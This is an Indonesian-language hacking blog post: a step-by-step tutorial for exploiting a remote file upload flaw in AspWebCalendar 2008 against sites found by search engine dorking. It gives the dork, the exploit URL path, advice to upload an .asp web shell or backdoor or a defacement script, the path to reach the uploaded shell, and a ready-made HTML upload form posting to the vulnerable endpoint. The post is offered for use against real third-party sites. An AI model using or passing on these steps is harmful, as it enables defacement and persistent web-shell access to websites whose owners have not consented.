Nuenomaru disini .-.
Kalii iniii Nue bakal bahas dan share Tutorial eXploit AspWebCalendar 2008 Remote File Upload Vulnerability , *ini exploit lama sih , iseng2 share kali aja masih
langsung aja intip tutorialnya :*
Dork :calendar.asp?eventdetail
1. Dorking dengan searchengine, lalu pilih web target yg mau di tusbo'ol
Exploit: /path/calendar_admin.asp?action=uploadfile
2. masukin exploitnya di belakan url target
www.target.co.li/path/calendar_admin.asp?action=uploadfile
3. Vuln o.O ?? kurang lebih muncul form upload *liat gambar
4. kalau mau upload shell, disarankan gunakan shell/backdoor berekstensi .asp (sesuai dgn judul ini exploit) ,, tapi kali ini gua langsung upload script depes berekstensi .asp
kalo mau upload shell/backdoor, gunakan yg ekstensi .asp
Shell/file akses: /path/calendar/eventimages/yourshell.asp
www.target.co.li//path/calendar/eventimages/yourshell.asp
 |
| ciyee, done~ |
Nih yang butuh CSRF Uploadnya:
<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
Kurang Jelas? :/ Ni Nonton Videonya :)
No comments:
Post a Comment